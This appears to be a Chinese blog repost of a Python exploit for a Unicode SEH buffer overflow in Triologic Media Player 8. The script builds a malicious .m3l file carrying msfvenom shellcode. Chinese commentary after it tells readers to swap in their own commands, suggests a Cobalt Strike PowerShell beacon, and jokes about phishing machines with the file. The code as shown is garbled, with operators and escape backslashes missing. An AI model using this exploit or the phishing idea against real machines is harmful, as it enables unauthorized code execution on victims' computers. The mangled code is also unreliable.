渗透测试|Triologic Media Player 8 .m3l 缓冲区溢出 (Unicode) (SEH)

2022-09-08 11:39:05 浏览数 (1)

至少我们曾经在一起过。

来自:一言

var xhr = new XMLHttpRequest(); xhr.open('get', 'https://v1.hitokoto.cn/'); xhr.onreadystatechange = function () { if (xhr.readyState === 4) { var data = JSON.parse(xhr.responseText); var hitokoto = document.getElementById('hitokoto'); hitokoto.innerText = data.hitokoto; } } xhr.send();

exp代码

代码语言:javascript复制
# Exploit Title: Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)
# Date: 2020-04-04
# Author: Felipe Winsnes
# Software Link: http://download.cnet.com/Triologic-Media-Player/3000-2139_4-10691520.html
# Version: 8
# Tested on: Windows 7 (x86)

# Proof of Concept:
# 1.- Run the python script, it will create a new file called "poc.m3l".
# 2.- Open the Application.
# 3.- Some windows warning boxes regarding sound issues may pop up, just click OK.
# 4.- Click on the bottom-right button that displays an arrow and has written "LIST".
# 5.- Select the file "poc.m3l".
# 6.- Profit.

import struct

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/unicode_mixed BufferRegister=EAX EXITFUNC=thread 
# Payload size: 512 bytes

buf =  b""
buf  = b"x50x50x59x41x49x41x49x41x49x41x49x41x49"
buf  = b"x41x49x41x49x41x49x41x49x41x49x41x49x41"
buf  = b"x49x41x49x41x49x41x6ax58x41x51x41x44x41"
buf  = b"x5ax41x42x41x52x41x4cx41x59x41x49x41x51"
buf  = b"x41x49x41x51x41x49x41x68x41x41x41x5ax31"
buf  = b"x41x49x41x49x41x4ax31x31x41x49x41x49x41"
buf  = b"x42x41x42x41x42x51x49x31x41x49x51x49x41"
buf  = b"x49x51x49x31x31x31x41x49x41x4ax51x59x41"
buf  = b"x5ax42x41x42x41x42x41x42x41x42x6bx4dx41"
buf  = b"x47x42x39x75x34x4ax42x79x6cx7ax48x61x72"
buf  = b"x39x70x6bx50x49x70x73x30x54x49x47x75x70"
buf  = b"x31x79x30x4fx74x72x6bx70x50x70x30x32x6b"
buf  = b"x51x42x7ax6cx74x4bx42x32x6ex34x64x4bx64"
buf  = b"x32x6bx78x6cx4fx57x47x4dx7ax4dx56x4ex51"
buf  = b"x59x6fx46x4cx4fx4cx71x51x61x6cx49x72x4c"
buf  = b"x6cx6dx50x36x61x46x6fx6cx4dx4ax61x37x57"
buf  = b"x69x52x7ax52x31x42x51x47x74x4bx6ex72x4a"
buf  = b"x70x44x4bx30x4ax4dx6cx34x4bx6ex6cx5ax71"
buf  = b"x74x38x39x53x6dx78x49x71x5ax31x70x51x62"
buf  = b"x6bx70x59x6bx70x5ax61x46x73x62x6bx4ex69"
buf  = b"x4ax78x48x63x4fx4ax61x39x72x6bx4dx64x62"
buf  = b"x6bx4ax61x36x76x4cx71x59x6fx44x6cx45x71"
buf  = b"x58x4fx6ax6dx49x71x39x37x4dx68x39x50x73"
buf  = b"x45x58x76x69x73x43x4dx4cx38x4fx4bx31x6d"
buf  = b"x4cx64x72x55x58x64x72x38x62x6bx30x58x4f"
buf  = b"x34x6ax61x7ax33x31x56x54x4bx4cx4cx6ex6b"
buf  = b"x44x4bx50x58x4dx4cx4ax61x38x53x72x6bx5a"
buf  = b"x64x54x4bx5ax61x58x50x33x59x61x34x6dx54"
buf  = b"x6cx64x71x4bx51x4bx6fx71x62x39x70x5ax6f"
buf  = b"x61x79x6fx47x70x61x4fx61x4fx71x4ax44x4b"
buf  = b"x4dx42x38x6bx34x4dx4fx6dx42x4ax49x71x62"
buf  = b"x6dx42x65x45x62x69x70x39x70x59x70x50x50"
buf  = b"x51x58x4dx61x74x4bx42x4fx33x57x6bx4fx46"
buf  = b"x75x37x4bx47x70x6bx6dx6ex4ax5ax6ax53x38"
buf  = b"x46x46x52x75x65x6dx45x4dx6bx4fx57x65x6d"
buf  = b"x6cx7ax66x43x4cx6cx4ax35x30x59x6bx67x70"
buf  = b"x50x75x6bx55x45x6bx4dx77x5ax73x32x52x52"
buf  = b"x4fx30x6ax59x70x51x43x69x6fx38x55x52x43"
buf  = b"x50x61x32x4cx61x53x6cx6ex43x35x51x68x6f"
buf  = b"x75x4dx30x41x41"

nseh = "x71x41"
seh = "x41x4a"

alignment = ""
alignment  = "x54x71"       # push ebx, padding
alignment  = "x58x71"       # pop eax, padding
alignment  = "x05x20x22"   # add eax, 0x22002000
alignment  = "x71"           # Padding
alignment  = "x2Dx19x22"   # sub eax, 0x22001900
alignment  = "x71"           # Padding
alignment  = "x50x71"       # push eax, padding
alignment  = "xC3"           # retn

buffer = "A" * 536   nseh   seh   "x41x71x41x71"   alignment   "C" * 71   buf   "C" * 2000
f = open ("poc.m3l", "w")
f.write(buffer)
f.close()

利用复现

Triologic Media Player是一个免费的媒体播放器,他的8版本存在缓存区溢出,可以任意执行代码(有主机上线请注意)

使用

代码语言:javascript复制
msfvenom -p windows/exec CMD=calc.exe -f py -e x86/unicode_mixed BufferRegister=EAX EXITFUNC=thread

生成payload

替换掉buf

替换掉buf

替换掉buf

其中的CMD参数的值是要执行的cmd命令,各位都懂

然后运行Python脚本,会在脚本目录生成poc.m3l文件,如果用Triologic Media Player 8打开这个文件,则会执行预先设置的CMD命令

此处可以用CS生成powershell上线命令,直接上线[aru_5]

Win10默认没有装这个玩意,脚本的作者在Win7上测试成功了,不清楚在Win7,m3l文件的默认打开方式是不是Triologic Media Player

如果是,那么对于一些范围内的机器,可以尝试一波钓鱼[斜眼笑]

0 人点赞